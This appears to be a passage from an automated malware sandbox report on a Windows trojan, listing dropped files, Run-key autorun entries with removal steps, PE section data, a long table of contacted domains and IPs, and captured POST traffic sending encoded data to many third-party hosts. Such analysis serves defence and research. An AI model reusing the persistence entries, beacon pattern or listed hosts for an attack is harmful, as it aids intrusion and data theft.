%Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (49 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@starmedia[1].txt (223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\easyformations[1].htm (19 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@goodvaluecenter[1].txt (237 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@neurotoxininstitute[1].txt (246 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\detanses[1].htm (197 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cbsprinting.com[1].txt (235 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\solutioncorp[1].htm (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\brijindia[1].htm (28 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@golfpark-moossee[1].txt (281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\sarpy[1].htm (20 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@teasing-video[1].txt (233 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@paintball[1].txt (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\authentica-travel[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\403[1].htm (883 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\mibsga[1].htm (619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\bigtopmultimedia[1].htm (861 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\etcycles[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab5.tmp (54 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@telenavis[1].txt (225 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doctsf[1].txt (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\lockerlookz[1].htm (29 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@westhillsstl[1].txt (232 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ctr4process[2].txt (230 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KP27CLYF\lexjuridica[1].htm (3 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"zygyspypjysl" = "%Documents and Settings%\%current user%\zygyspypjysl.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"sufkywiddeax" = "%Documents and Settings%\%current user%\sufkywiddeax.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 602 | 1024 | 2.78109 | 113a7c284fcf4456308de7027b6ee820 |
.rdata | 8192 | 140 | 512 | 0.928075 | d2db33f388ee0b37fe18425ddae4394a |
.data | 12288 | 127 | 512 | 0.496935 | 3b95829f707498578661cb234d47259d |
.rsrc | 16384 | 44608 | 45056 | 5.12094 | d25dfb3c65a8834eb9e88372fdf29552 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://safetyconnection.ca/ | 209.222.48.210 |
hxxp://screaminpeach.com/ | 162.159.240.165 |
hxxp://avant-ime.com/ | 37.148.207.99 |
hxxp://rueggeberg.com/ | 81.209.182.37 |
hxxp://wlf.louisiana.gov/ | 184.106.119.164 |
hxxp://slcago.org/ | 97.74.80.192 |
hxxp://justconnect.co.za/ | 5.9.122.172 |
hxxp://plus.ba/ | 141.101.117.246 |
hxxp://victoria.com.pl/ | 89.161.158.128 |
hxxp://kvadratoff.ru/ | 188.93.212.32 |
hxxp://choice-select.com/ | 50.56.218.189 |
hxxp://cgc-england.com/ | 81.88.57.68 |
hxxp://y8k6h.x.incapdns.net/ | |
hxxp://miltinio-teatras.lt/ | 92.61.39.244 |
hxxp://nuritech.com/ | 222.239.78.139 |
hxxp://fabianonline.de/ | 88.198.7.211 |
hxxp://empordalia.com/ | 5.56.61.199 |
hxxp://padstow.com/ | 62.233.107.131 |
hxxp://boundbydesign.com/ | 97.74.55.128 |
hxxp://selldoor.pl/ | 89.161.251.237 |
hxxp://capitalcitytuxedo.com/ | 67.223.102.236 |
hxxp://courtney.ca/ | 67.223.102.97 |
hxxp://al-mawared.com/ | 209.50.248.224 |
hxxp://robertmcintyre.com.au/ | 199.73.58.66 |
hxxp://mattiussiecologia.com/ | 95.110.203.75 |
hxxp://biurimex.pl/ | 89.161.181.123 |
hxxp://acsmedioambiente.com/ | 50.97.221.19 |
hxxp://churchclothes.com/ | 97.74.42.79 |
hxxp://combine.or.id/ | 202.162.33.14 |
hxxp://mattiussiecologia.com/en/index.aspx | |
hxxp://tavdi.com/ | 141.101.117.121 |
hxxp://genmar.gen.tr/ | 108.162.196.71 |
hxxp://hostphd.com.br/ | 192.196.156.73 |
hxxp://bigjohnsbeefjerky.com/ | 162.159.246.113 |
hxxp://xuanxiao.com/ | 222.216.190.60 |
hxxp://eleterno.com/ | 184.168.233.1 |
hxxp://saios.net/ | 157.7.184.19 |
hxxp://myfilecenter.com/ | 66.33.213.228 |
hxxp://www.lucion.com/ | 174.143.71.146 |
hxxp://detanses.com/ | 144.76.86.115 |
hxxp://fastarchofamerica.com/ | 75.119.209.232 |
hxxp://gablemarine.com/ | 141.101.117.237 |
hxxp://iaiglobal.or.id/ | 49.50.8.93 |
hxxp://churchsupplies.net/ | 66.232.99.164 |
hxxp://marcusgrimes.co.uk/ | 109.74.242.160 |
hxxp://nanfangcw.com/ | 119.145.168.16 |
hxxp://perc.ca/ | 69.89.31.118 |
hxxp://shipeliteexpress.com/ | 108.162.199.142 |
hxxp://iaiglobal.or.id/v02 | |
hxxp://icigrain.com/ | 199.91.125.58 |
hxxp://mandi-man.com/ | 210.172.144.61 |
hxxp://sortedorganizing.com/ | 74.220.199.6 |
hxxp://geodecisions.com/ | 216.174.25.93 |
hxxp://nori-k.com/ | 210.172.144.24 |
hxxp://iaiglobal.or.id/v02/ | |
hxxp://audience-web.net/ | 195.22.26.253 |
hxxp://etcycles.com/ | 50.22.150.2 |
hxxp://d4drmedia.com/ | 208.70.247.105 |
hxxp://tvndra.net/ | 91.216.141.46 |
hxxp://jeangatz.com/ | 192.155.94.137 |
hxxp://altonhousehotel.com/ | 162.159.250.52 |
hxxp://stepnet.de/ | 162.159.246.50 |
hxxp://christybarry.com/ | 66.49.139.143 |
hxxp://austriansurfing.at/ | 85.13.151.94 |
hxxp://christybarry.com/cgi-sys/suspendedpage.cgi | |
hxxp://ctr4process.org/ | 162.159.242.119 |
hxxp://rewardhits.com/ | 66.45.248.130 |
hxxp://wildrosemarketing.com/ | 192.99.14.40 |
hxxp://spiti.org/ | 217.199.187.58 |
hxxp://sztartufi.com/ | 95.110.192.171 |
hxxp://upsilon89.com/ | 151.236.48.69 |
hxxp://berkshirebusiness.org/ | 64.99.80.30 |
hxxp://istanbultarim.com.tr/ | 108.162.199.72 |
hxxp://brijindia.com/ | 67.18.185.98 |
hxxp://gamblingonlinemagazine.com/ | 198.1.90.242 |
hxxp://optiver.com.au/ | 217.195.114.124 |
hxxp://topex.ro/ | 193.226.61.45 |
hxxp://solutioncorp.com/ | 209.208.32.245 |
hxxp://www.optiver.com/sydney/ | 217.195.124.19 |
hxxp://kaufthal.com/ | 72.172.133.51 |
hxxp://acicinvestor.ca/ | 207.150.203.36 |
hxxp://fleshercorp.com/ | 64.111.24.104 |
hxxp://cbsprinting.com.au/ | 162.159.250.145 |
hxxp://vanguardpkg.com/ | 50.62.115.1 |
hxxp://midwestga.com/ | 23.91.121.152 |
hxxp://aciuba.com.br/ | 186.249.220.203 |
hxxp://cksglobal.net/ | 108.175.147.156 |
hxxp://184.107.38.38/$ | |
hxxp://mibsga.com/ | |
hxxp://photoclubs.com/ | 209.50.251.101 |
hxxp://unslp.edu.bo/ | 50.28.58.0 |
hxxp://kagu-hokuren.com/ | 180.37.186.131 |
hxxp://d-j-b.net/ | 210.172.144.247 |
hxxp://nasz-sklep.pl/ | 91.192.164.134 |
hxxp://wsipowerontheweb.com/ | 108.162.199.18 |
hxxp://neurotoxininstitute.com/ | 141.101.113.135 |
hxxp://theautospas.com/ | 162.159.254.50 |
hxxp://taykon.com/ | 141.101.117.127 |
hxxp://racknstackwarehouse.com.au/ | 141.101.116.200 |
hxxp://easyformations.net/ | 88.208.216.219 |
hxxp://sullyfrance.com/ | 216.8.179.23 |
hxxp://ryumachi-jp.com/ | 111.68.174.253 |
hxxp://mastergrp-spb.ru/ | 186.2.166.49 |
hxxp://sdlp.ie/ | 108.162.199.239 |
hxxp://goodvaluecenter.com/ | 162.159.246.190 |
hxxp://bigtopmultimedia.com/ | 108.162.198.246 |
hxxp://sarpy.com/ | 74.51.217.10 |
hxxp://rea-soft.ru/ | 78.47.135.34 |
hxxp://paintball.be/ | 213.186.33.19 |
hxxp://lexjuridica.com/ | 176.28.103.205 |
hxxp://cabooseonline.com/ | 192.138.20.228 |
hxxp://ezmedi.com/ | 218.150.78.243 |
hxxp://automa.it/ | 95.110.195.52 |
hxxp://e-kagami.com/ | 54.249.238.243 |
hxxp://coopsupermarkt.nl/ | 213.247.43.95 |
hxxp://asj.co.jp/ | 219.118.206.4 |
hxxp://mastechn.com/ | 64.207.148.243 |
hxxp://telenavis.com/ | 108.162.198.13 |
hxxp://iktus.fr/ | 37.187.20.229 |
hxxp://authentica-travel.com/ | 98.124.199.1 |
hxxp://mail57.us2.mcsv.net/ | 173.231.139.57 |
hxxp://buzzkillmedia.com/ | 173.201.140.128 |
hxxp://mailchimp.com/about/mcsv/ | 173.192.210.69 |
hxxp://tessera.co.jp/ | 210.150.6.88 |
hxxp://gcs-cpa.com/ | 64.14.68.37 |
hxxp://acmepacificrepairs.com/ | 69.198.129.78 |
hxxp://c21edu.com/ | 76.74.254.123 |
hxxp://thesergery.com/ | 202.47.95.44 |
hxxp://osouji-school.com/ | 211.13.204.89 |
hxxp://westhillsstl.org/ | 108.162.197.220 |
hxxp://starmedia.ca/ | 108.162.196.155 |
hxxp://doctsf.com/ | 213.186.33.97 |
hxxp://seobook.com/ | |
hxxp://shakeyspizza.ph/ | 122.55.79.88 |
hxxp://bocr.cz/ | 217.198.113.104 |
hxxp://tobler-skele.bg/ | 164.138.219.128 |
hxxp://tokai-service.com/ | 157.7.170.103 |
hxxp://cefam-atlas.fr/ | 193.27.78.88 |
hxxp://schiedel.it/ | 217.145.99.26 |
hxxp://loteria1benifaio.com/ | 188.93.73.25 |
hxxp://discoveryplace.org/ | 72.52.221.192 |
hxxp://dithd.com/ | 216.177.135.4 |
hxxp://shinpd.com/ | 211.202.2.230 |
hxxp://maximilianeum.ch/ | 213.200.193.129 |
hxxp://thesyntheticfamily.com/ | 91.201.63.18 |
hxxp://harpersphoto.co.uk/ | 77.73.7.225 |
hxxp://proadec.com.br/ | 94.23.12.31 |
hxxp://golfpark-moossee.ch/ | 149.126.72.165 |
hxxp://calcitrusquality.org/ | 67.223.102.79 |
hxxp://differentimages.nl/ | 213.132.197.183 |
hxxp://polybeekindia.com/ | 112.78.124.166 |
hxxp://amberhotels.cz/ | 83.167.228.108 |
hxxp://gelpass.com/ | 94.125.164.238 |
hxxp://2wheelife.com/ | 204.74.219.83 |
hxxp://lockerlookz.com/ | 50.63.84.77 |
hxxp://namedecision.com/ | 195.246.231.195 |
hxxp://teasing-video.com/ | 162.159.247.204 |
hxxp://catholic-school-girls.com/ | 208.122.192.215 |
hxxp://forest43.ru/ | 91.218.228.111 |
hxxp://nox.sk/ | 80.87.208.167 |
hxxp://benefits-inc.com/ | 65.254.248.193 |
hxxp://welbilt-thailand.com/ | 202.170.120.80 |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootseq.txt | |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/authrootstl.cab | |
hxxp://a26.d.akamai.net/msdownload/update/v3/static/trustedr/en/B1BC968BD4F49D622AA89A81F2150152A41D829C.crt | |
hxxp://qistech.com/ | 181.224.139.27 |
hxxp://durandigitalmedia.com/ | 66.33.210.130 |
hxxp://aecnet.co.jp/ | 211.1.227.194 |
hxxp://garywollin.com/ | 206.176.241.122 |
hxxp://sugarfoote.com/ | 64.69.95.27 |
hxxp://bizeulimmobilier.com/ | 37.59.19.147 |
hxxp://siriusgt.com/ | 208.76.82.115 |
hxxp://maewang.com/ | 122.155.168.127 |
hxxp://dotnetpia.co.kr/ | 121.189.62.216 |
hxxp://doehrer.com/ | 46.4.100.186 |
hxxp://tsu-box.com/ | 119.245.179.7 |
hxxp://polishpotterydirect.com/ | 65.36.150.46 |
hxxp://simplysup1.com/ | 115.124.111.100 |
hxxp://kosovaere.com/ | 80.80.160.19 |
kioil.com | 222.122.205.133 |
krenim.org | 65.190.214.165 |
www.justconnect.co.za | 5.9.122.172 |
sceram.com | 62.244.84.23 |
www.photoclubs.com | 209.50.251.101 |
matrax.bg | 83.170.68.216 |
alc-mg.com | 125.206.117.107 |
royalbotania.net | 77.73.100.76 |
jivarogroup.com | 74.63.154.193 |
gerard-alsacien.com | 178.170.127.80 |
in1.smtp.messagingengine.com | 66.111.4.73 |
www.traderush.com | 199.83.128.93 |
m4m-usa.com | 198.1.114.189 |
revocars.com | 127.0.0.1 |
centrevillesettlement.com | 216.117.172.203 |
jonglierkatakomben.com | 85.214.56.196 |
www.myfilecenter.com | 66.33.213.228 |
bandera-roja.com | 213.177.193.241 |
barattare.net | 62.149.128.166 |
celebikalip.com.tr | 10.0.0.1 |
www.ctr4process.org | 162.159.241.119 |
coe.pku.edu.cn | 162.105.5.245 |
vitalur.by | 178.159.246.76 |
johnnykimono.com | 199.102.229.199 |
mxs.mail.ru | 94.100.180.150 |
autohaus-repp.de | 80.190.241.108 |
imaginehomessa.com | 173.236.152.199 |
jeansmate.co.jp | 211.1.230.105 |
printscharmingbc.ca | 216.147.108.89 |
khl.org.uk | 87.117.202.137 |
audio-direkt.net | 127.0.0.1 |
mcvdberg.co.za | 197.242.159.40 |
coplanar.seobook.com | 207.97.249.100 |
pluginz.ru | 89.108.108.60 |
lists.riseup.net | 198.252.153.14 |
pisomania.com | 89.248.100.138 |
lingewaelsche.com | 31.200.209.162 |
cadbaz.com | 213.186.33.87 |
gmail-smtp-in.l.google.com | 173.194.76.26 |
adultlivechat.us | 127.0.0.1 |
princetonhistory.org | 66.201.98.71 |
edfmodel.com | 103.14.141.42 |
luckygroup.biz | 198.55.121.100 |
appliedspectra.com | 173.247.250.120 |
alt4.gmail-smtp-in.l.google.com | 173.194.69.26 |
ivcircus.ru | 91.219.194.14 |
hartmultimedia.com | 196.215.16.48 |
theanniversarycompany.com | 67.23.255.58 |
torkair.com | 66.7.204.43 |
arckepesajandek.hu | 127.0.0.1 |
madmimi.com | 216.180.230.174 |
aethora.com | 67.207.143.253 |
atelier-enseignes.com | 213.186.33.16 |
bureauriscos.com.br | 189.113.2.106 |
www.bocr.cz | 217.198.113.104 |
gomadagascar.com | 64.62.163.238 |
www.download.windowsupdate.com | 72.247.8.48 |
konishi-hp.com | 122.219.254.148 |
lasgo.co.uk | 195.177.192.15 |
madamlau.com | 0.0.0.0 |
www.icigrain.com | 199.91.125.58 |
szostka.com | 127.0.0.1 |
mail7.digitalwaves.co.nz | 127.0.0.1 |
teamboo.com | 64.91.232.139 |
ks110.com | 210.168.113.85 |
zeronet.co.jp | 49.212.5.127 |
denno-insatsu.com | 141.8.224.35 |
huntscombo.com | 63.97.179.121 |
cabletech.co.za | 92.52.122.202 |
www.bigjohnsbeefjerky.com | 162.159.245.113 |
pyxis2.org | 81.93.240.128 |
www.mibsga.com | 74.124.214.210 |
www.solutioncorp.com | 209.208.32.245 |
anemomylos.com | 176.9.47.70 |
asterisk.com.sg | 211.25.3.196 |
bonafidekrewe.com | 209.235.255.87 |
destolfos.com | 74.220.17.18 |
legalserver.org | 67.202.93.52 |
dormfantasies.com | 184.94.149.35 |
bestebproperties.com | 216.14.125.49 |
ewapps.com | 85.88.34.6 |
jigami.com | 199.7.108.64 |
www.iaiglobal.or.id | 49.50.8.93 |
bredainternet.nl | 127.0.0.1 |
www.teknorhino.com | 66.45.248.130 |
fujisangyo.com | 203.137.44.163 |
www.saios.net | 157.7.184.19 |
ifta.org | 204.12.25.10 |
storci.com | 88.149.156.78 |
www.biurimex.pl | 89.161.181.123 |
ans-service.com | 67.227.252.139 |
lapanthera.hu | 195.56.148.119 |
smtp.live.com | 65.55.162.200 |
alfaglass.ru | 195.216.243.44 |
www.mattiussiecologia.com | 95.110.203.75 |
trenpalau.com | |
fujino-lab.com | |
guberman.com.br | |
nichedictionary.com | |
meubles-jacquelin.com | |
felipegarrote.com | |
academiamc.com | |
hoyuu.com | |
isle-karnataka.org | |
bapasitaramsevatrust.org | |
x-cellcommunications.de | |
niray.com.cn | |
enzoyrodrigo.com.br |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: nanfangcw.com
Connection: Keep-Alive
Cache-Control: no-cache
HP0OBb1gc6SaODwCdCpLAfbzlnLrzqDTQQ3ySiU8YaQzabbptfBhrwJQMX382R8Y
SNGmQixh3RqlYY4ctvx0Pek/pBRYQv14Uyb04 cBJZGz/vlTDk0ggaYLuxgmF5aA
NQ7nYe0N5QIBePBQj6SX1T6u7OnHubQK7VcFWxdFxIfzrHV/nCDGQ5LamX6VSuaP
dqnMWbeN3p5G79JBMcQhNRt7FYmlnYK3vmr9ARldoKjkv3OXW1W8M6IIQJSbyYMH
dOdSZ lFSFahxKPrwwaK7nYhTwaQmKemOh0kiG5EoZNMZxqrsYGlbkTWX0DDJELJ
hzL/2wT3GJi57JfDWAsMaf8CiAo8EaFZkhx23DF6RgukpihksZvHqrSLiJ1LKmGJ
Xza7jPoIREGSNsqZhw8VkF6HEN eZm2YW83kuU46L/JAiAme3KJ6uikznxpKpRUD
AI2rEmFqNNGAZWUpsx49petYG2jCO15Bb/Ps2MOV
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 219
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: dotnetpia.co.kr
Connection: Keep-Alive
Cache-Control: no-cache
....,...=[..N..._...px....3..6I...^...s..S...........p......./.. ...<...ML4...I.
_..itq.............d......$...i#.....A'N 7.c"D..%...&w..(.h.*.-.-.../.. 1.JA3..V5..l7h.9...;.&.=?..?P..AaC.Cr..F...H.`,J..AL..WN.}lP...
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=euc-kr
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ob025wlspo40ycyzbxo5ztlb; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 12 Apr 2014 14:42:08 GMT
Content-Length: 21278
..<HTML>...<HEAD>....<meta http-equiv="Content-Type" content="text/html; charset=euc-kr">....<title>:: ............ ........ :: ........ </title>......<link href="/StyleSheets/dotnetpia.css" rel="stylesheet" type="text/css">....<script type="text/JavaScript" language="JavaScript" src="/Scripts/jquery.js"></script>....<script type="text/JavaScript" language="JavaScript" src="/Scripts/flash.js"></script>....<script type="text/JavaScript" language="JavaScript" src="/Scripts/java_func.js"></script>....<script type="text/JavaScript" language="JavaScript" src="/Scripts/cstm_site.js"></script>....<script type="text/JavaScript" language="JavaScript" src="/Scripts/DomainSearch.js"></script>....<script type="text/javascript">.....function onPageLoad() {..//....if (getCookie("pop_idc_move") != "done") {..//.... var prop = {..//.... top: 80,..//.... left: 150,..//.... width: 542,..//.... height: 657..//.... }..//.... CreateLayerPopup("Notice/IdcMove/notice.htm", prop);..//....}......rotate();.. }.. var nPopupCnt = 0;.. function CreateLayerPopup(FileName, Properties) {.. var oDiv = document.createElement('DIV');.. oDiv.setAttribute('id', 'divPopup_' nPopupCnt);.. .. var oIFrame = document.createElement('iFrame');.. oIFrame.setAttribute('id', 'iFramePopup_' nPopupCnt);..
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 47
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: differentimages.nl
Connection: Keep-Alive
Cache-Control: no-cache
..L..R..w.....a.-...........KvB..@......\.W....
HTTP/1.1 302 Moved Permanently
Date: Sat, 12 Apr 2014 14:41:55 GMT
Server: Apache
location: hXXp://ww1.differentimages.nl
X-Powered-By: PleskLin
Content-Length: 0
Connection: close
Content-Type: text/html
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 550
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: victoria.com.pl
Connection: Keep-Alive
Cache-Control: no-cache
2jvc6ue0zZ/szE0Fli2E rCbpwZdL3dcC5/obErDRgTR5SLvyQmvN7aBSJ5F4yYe
cx o/Z2UOoDsqeL5DaGcIJXoNWJ82QLTNaSTnsWpnhnp4BSHLhQUMjsfIGId39BQ
b4OwI pGhVwCFAfB1mNCpA6nJgSpOXTgDRsRtERvRFmLrKA/EHDZqjwOO bu3qT0
gTxUtbhWYYmtZhMgmpoxT7t2Xal2XeERRAxEtqsxVoaha9eTVagPcoWHMISqrsu7
Dc 8KAl/Ybww6H0QiRNHXsfy/URYRdAE32rxtZ3nAsAREsJ7/8c 3JGY9G3gXVV
uj/JFzYNKx4tg7fRS6Zd58r0eNIWLYPBllcTyuoJ7tVaHI L1aBPDGEW9JhvVk4Z
dfBau/5Z0TeKrCGlLncqoFlcqUw4oYIsJLjF7UvlYB8bA7Bz0lT/ 2tsHAjelhNF
E12ExFpUh6QlNeYDI4Vlp2Ak NIddmuN9H6ZtqyE7VL54oU20O7/goKkd3K/ BDd
UnZFisSdxRE27f135NI4
HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 171
Content-Type: text/html
Date: Sat, 12 Apr 2014 14:40:16 GMT
Server: IdeaWebServer/v0.80
<HTML>.<HEAD>...<TITLE>403 Forbidden</TITLE>..</HEAD>.<BODY BGCOLOR=#FFFFFF>...<H1>403 Forbidden</H1>..You don't have permission to access this document...</BODY>.</HTML>...
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.teknorhino.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 12 Apr 2014 14:41:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.17
<<< skipped >>>
<<
<<< skipped >>>
GET /sydney/ HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.optiver.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 12 Apr 2014 14:41:43 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
274a..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://VVV.w3.org/1999/xhtml" xml:lang="en">..<head>....<title>Optiver Asia Pacific - A leading market making trading company</title>.........<meta name="description" content="Optiver is a leading market maker in the field of proprietary an derivatives trading." />.........<meta name="keywords" content="Optiver, optiver, Asia, Pacific, Asia, Pacific, Sydney, sydney, Trading, trading, Market making" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />...<meta http-equiv="Cache-control" content="public" />...<meta name="keywords" content="" />...<meta name="description" content="" /> ...<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />...<base href="hXXp://VVV.optiver.com/sydney/" />...<link rel="stylesheet" type="text/css" href="./inc/css/MyFontsWebfontsKit.css" />...<link rel="stylesheet" type="text/css" href="./inc/css/screen.css" />...<!--[if IE]>....<link rel="stylesheet" type="text/css" href="loadcss/ie6" media="screen" />...<![endif]-->...<link href="inc/favicon.ico" rel="shortcut icon" type="image/x-icon" />...<script type="text/javascript" src="./inc/js/mootools-1.2.3-core-yc.js"></script>...<script type="text/javascript" src="./inc/js/mootools-1.2.3.1-more.js"></script>...<script type="text/javascript" src
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 558
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bigjohnsbeefjerky.com
Connection: Keep-Alive
Cache-Control: no-cache
QgLM5hT S6HQfDu 79J6hGcWKnKMyKjKiOy8ZC 6MOXlEjsulE2O6Zrh1Aplg6Wk
AVSqK9/G U07TzZPN2T jpLwIXngsmU7IfhS1Gu9nXGWhsA5PyTki kPeJPnBEEJ
fvQc7QjEzWDZdMqu/WL7OHYmqkUJ0WITgnibGhc90Ot/OknOmr9m1 V6FIZGH2hv
Jp9sYC6vn17afejmF1 ClbHz/9NINu6ZLTLRqMTBEQs6Gq 3cody2t0XozUNdQi5
ruuOzCkQCtP7dQ6GcQgufI967ysvVQOfrNeVw6WstsVZRCH4ggsi/yIXCPudwIQd
dBwY1whDUpAlYGvi/GVdxfB0pt1MZNEaeOzt8iT9DwW99PCbt5gbuDdy43KT7u1j
l6ugpQ9FrXk4LYcWdGYRqrSWSAEAXBC6KgSykBI1EnJV9AJhcf85D vPf46JrSN5
vCXTM3SjmfKeznfvGq0hSBwEbNEt/pqAvfbQPpOv zMb1HrDYjeQZmuehqOMEsvt
brrjC7kyfKo1CDxfkxszU6Fa1ubA
HTTP/1.1 301 Moved Permanently
Server: cloudflare-nginx
Date: Sat, 12 Apr 2014 14:40:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d09eade82e09a5211bd069a69b61571511397313626760; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.bigjohnsbeefjerky.com; HttpOnly
Cf-Railgun: direct (starting new WAN connection)
Location: hXXp://VVV.bigjohnsbeefjerky.com/
CF-RAY: 11a02dd743dc0098-IAD
40d..<html>.<head><title>301 Moved Permanently</title><script type="text/javascript">.//<![CDATA[.try{if (!window.CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mirage2:0,oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=02fcfa4f56/"},atok:"4cffc7936e86dea501d8c5bb9337a38d",petok:"f3b26fbef6f615591f688331a87db36cd2aa8a30-1397313626-1800",zone:"bigjohnsbeefjerky.com",rocket:"0",apps:{}}];CloudFlare.push({"apps":{"ape":"b4ed2853645ded890dad6285216c442f"}});!function(a,b){a=document.createElement("script"),b=document.getElementsByTagName("script")[0],a.async=!0,a.src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=b064e16429/cloudflare.min.js",b.parentNode.insertBefore(a,b)}()}}catch(e){};.//]]>.</script>.</head>.<body bgcolor="white"><script type="text/javascript">//<![CDATA[try{(function(a){var b="hXXp://",c="bigjohnsbeefjerky.com",d="/cdn-cgi/cl/",e="img.gif",f=new a;f.src=[b,c,d,e].join("")})(Image)}catch(e){}//]]></script>.<center><h1>301 Moved Permanently</h1></center>.<hr><center>nginx</center>.</body>.</html>..1.....0..
<<
<<< skipped >>>
POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 534
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: lexjuridica.com
Connection: Keep-Alive
Cache-Control: no-cache
//EMnHHkPrP u6m2kJOutMqRpVWvPo39NQoj5CzK/MrrC/zmHxqmAPQo3KKyzaEX
XH8po8BJgOkKTwYSjOioFcxL2 NLNwi6LDLzfpf3LNxzWs5DNyp vJ8UdAHzOd3k
rPz6dOcNep7PMFeW35LlYT3rUSwmT6IB6H 1LjvIt1MYaTvxwOAhD3uuvqkMkX6M
Xi0/aLImf/wfj/ccieO4G235oDTeF5WBdjzO6tEyue9m96cYUg NG2DXW Uva b
U4d5vdCOo yyGhldFdT/PinM Hgw3uZszvg aJ joDPys0Silr4RPWQwUoe ON6C
cSxDcYt3s/1gq cnpk5tzmbmLelHZvR9EVFGg4medX2F6OF/q33wtTEOHtRc5xQb
